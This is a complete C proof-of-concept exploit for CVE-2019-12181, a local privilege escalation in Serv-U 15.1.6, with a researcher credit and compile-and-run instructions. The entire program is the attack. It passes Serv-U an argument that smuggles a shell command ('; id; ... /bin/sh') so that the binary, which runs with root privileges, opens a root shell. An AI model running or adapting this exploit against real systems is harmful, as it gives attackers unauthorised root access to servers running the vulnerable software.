Share
/*  
  
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation   
  
vulnerability found by:  
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev  
  
to compile and run:  
gcc servu-pe-cve-2019-12181.c -o pe && ./pe  
  
*/  
  
#include <stdio.h>  
#include <unistd.h>  
#include <errno.h>  
  
int main()  
{   
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};  
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);  
// if execv is successful, we won't reach here  
printf("ret val: %d errno: %d\n", ret_val, errno);  
return errno;  
}